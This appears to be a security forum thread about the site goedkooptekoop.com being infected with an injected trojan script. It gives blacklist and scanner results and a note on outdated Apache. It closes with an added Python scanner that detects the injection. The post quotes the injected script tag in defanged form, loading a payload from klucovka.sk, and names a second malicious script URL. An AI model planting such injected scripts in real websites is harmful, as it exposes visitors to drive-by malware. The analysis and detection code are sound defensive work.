JS:Iframe-AEL [Trj] detected on website!

See: http://killmalware.com/goedkooptekoop.com/ 15 hours ago!
I get a

{"result": 0, "verbose_msg": "Invalid URL"}

Three blacklist flags: https://www.virustotal.com/nl/url/09f0d69d0242afac39b14d2b786e5504d3ba0420c8b3c66a4fef60f7faa15e83/analysis/1420993495
IP badness status: https://www.virustotal.com/nl/ip-address/94.124.93.162/information/
Avast detects this malware kicked up from IP domain: JS:Iframe-AMJ [Trj]
Malicious Reason: Detected encoded JavaScript code commonly used to hide malicious behaviour.
Details: Malicious obfuscated JavaScript threat

<!--321809--><script type="text/javascript" src="htxp://klucovka.sk/mqc4kwpj.php?id=20644204"></script><!--/321809-->

and Javascript included from a blacklisted domain. Details: http://sucuri.net/malware/entry/MW:BLK:2 Javascript: -klucovka.sk (Netblock owner - -ns1.keurigonline22.nl → http://www.dnsinspect.com/keurigonline22.nl/1420993895 (minor issues). hoster: http://www.dnsinspect.com/cj2hosting.nl/1420994026
http://www.seomastering.com/hosting/Keurigonline%20blok%202/
4 on blacklist: http://sitevet.com/db/asn/AS39704 as malicious URLs and badware,
Blacklisted external link: http://sitecheck.sucuri.net/results/klucovka.sk
List of scripts included
htxp://www.fireworx.be/bk36wn2p.php?id=2325145

HTTP/1.1 302 Found
Date: Sun, 11 Jan 2015 16:40:44 GMT
Server: Apache
X-Powered-By: PHP/5.4.35
Location: http://localhost/
Content-Length: 1
Content-Type: text/html

In the response body we get Apache/2.2.22 (Linux/SUSE) and we know Outdated Server Software is involved.
Reached via GET //localhost/ HTTP/1.1
Host: localhost

 
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<title>Access forbidden!</title>
<link rev="made" href="mailto:%5bno%20address%20given%5d" />
<style type="text/css"><!--/*--><![CDATA[/*><!--*/ 
body { color: #000000; background-color: #FFFFFF; }
a:link { color: #0000CC; }
p, address {margin-left: 3em;}
span {font-size: smaller;}
/*]]>*/--></style>
</head>

<body>
<h1>Access forbidden!</h1>
<p>
You don't have permission to access the requested directory.
There is either no index document or the directory is read-protected.
</p>
<p>
If you think this is a server error, please contact
the <a href="mailto:%5bno%20address%20given%5d">webmaster</a>.
</p>

<h2>Error 403</h2>
<address>
<a href="/">localhost</a>
<span>Sun Jan 11 17:43:40 2015
Apache/2.2.22 (Linux/SUSE)</span>
</address>
</body>
</html> 

See: http://www.cvedetails.com/vulnerability-list/vendor_id-45/product_id-66/version_id-142323/Apache-Http-Server-2.2.22.html

polonus

Read: http://www.engadget.com/2014/10/06/cowl-web-privacy/
See results here: http://jsunpack.jeek.org/?report=96fae4c9ad74e532a0609bee0396c8e3b0f52246
For security research only, open above link up inside browser with NoScript extension active and inside a VM/sandbox.
See: http://fetch.scritch.org/%2Bfetch/?url=goedkooptekoop.com%2F+&useragent=Fetch+useragent&accept_encoding=
→ htxp://klucovka.sk/mqc4kwpj.php?id=20644204

polonus
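The injected line quoted in the first post has a recognisable shape: one external script tag wrapped in a matching pair of numeric marker comments. The scanner below is an added example, not part of the original posts or of any scanner they link to; it flags that shape in a page's HTML and reports whether the script host differs from the site's own. The function names and the sample page are constructed for illustration.

```python
import re
from urllib.parse import urlsplit

# <!--N--> <script ... src="..."></script> <!--/N--> with the same number N
# on both sides: the wrapper seen around the injected script in the post.
INJECT_RE = re.compile(
    r'<!--(?P<marker>\d+)-->\s*'
    r'<script\b[^>]*\bsrc\s*=\s*["\'](?P<src>[^"\']+)["\'][^>]*>\s*</script>\s*'
    r'<!--/(?P=marker)-->',
    re.IGNORECASE,
)

def refang(url):
    """Map a defanged htxp:// or hxxp:// scheme to http:// for parsing only."""
    return re.sub(r'^h(?:tx|xx)p(s?)://', r'http\1://', url, flags=re.IGNORECASE)

def bare_host(host):
    """Lower-case a host name and drop a leading 'www.'."""
    host = (host or "").lower()
    return host[4:] if host.startswith("www.") else host

def find_injected_scripts(html, site_host):
    """Return one finding per marker-wrapped script tag found in html."""
    findings = []
    own = bare_host(site_host)
    for m in INJECT_RE.finditer(html):
        host = bare_host(urlsplit(refang(m.group("src"))).hostname)
        findings.append({
            "marker": m.group("marker"),
            "src": m.group("src"),  # kept exactly as written in the page
            "host": host,
            "third_party": bool(host) and host != own,
        })
    return findings

# Constructed sample page: two ordinary local scripts plus the injected line
# from the post (URL left defanged, as posted).
SAMPLE_PAGE = '''<html><head>
<script type="text/javascript" src="/js/menu.js"></script>
<!-- 321809 banner --><script src="/js/banner.js"></script>
</head><body>
<!--321809--><script type="text/javascript" src="htxp://klucovka.sk/mqc4kwpj.php?id=20644204"></script><!--/321809-->
</body></html>'''

if __name__ == "__main__":
    for f in find_injected_scripts(SAMPLE_PAGE, "goedkooptekoop.com"):
        print(f)
```
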